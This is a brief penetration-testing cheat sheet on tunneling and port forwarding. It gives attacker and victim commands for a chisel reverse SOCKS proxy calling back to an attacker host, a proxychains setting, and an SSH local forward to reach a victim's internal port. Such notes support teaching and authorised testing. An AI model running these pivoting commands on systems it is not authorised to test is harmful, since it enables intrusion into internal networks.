Tunneling and Port Forwarding
Last updated
Last updated
Download it from here: https://github.com/jpillora/chisel
Attacker:
./chisel server -p 1080 --reverse
Victim:
./chisel.exe client 10.10.10.1:1080 R:1111:socks
Attacker:
cat /etc/proxychains.conf
...
socks5 127.0.0.1 1111
Suppose the victim has port 8080 internally (127.0.0.1), and you want to see it, so you create a tunnel to redirect the content of the internal and remote 8080 port to your local port 8001:
ssh -L 8001:127.0.0.1:8080 user@host